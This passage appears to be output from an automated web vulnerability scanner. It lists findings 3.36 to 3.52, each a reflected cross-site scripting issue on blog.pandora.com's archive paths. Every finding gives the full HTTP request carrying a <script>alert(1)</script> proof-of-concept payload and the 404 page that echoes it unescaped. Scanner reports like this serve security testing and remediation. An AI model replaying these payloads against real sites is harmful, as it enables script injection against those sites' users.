Request

GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p>
...[SNIP]...

3.36. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p>
...[SNIP]...

3.37. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p>
...[SNIP]...

3.38. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p>
...[SNIP]...

3.39. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p>
...[SNIP]...

3.40. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p>
...[SNIP]...

3.41. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p>
...[SNIP]...

3.42. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p>
...[SNIP]...

3.43. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p>
...[SNIP]...

3.44. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p>
...[SNIP]...

3.45. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p>
...[SNIP]...

3.46. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p>
...[SNIP]...

3.47. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p>
...[SNIP]...

3.48. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p>
...[SNIP]...

3.49. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p>
...[SNIP]...

3.50. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p>
...[SNIP]...

3.51. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p>
...[SNIP]...

3.52. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
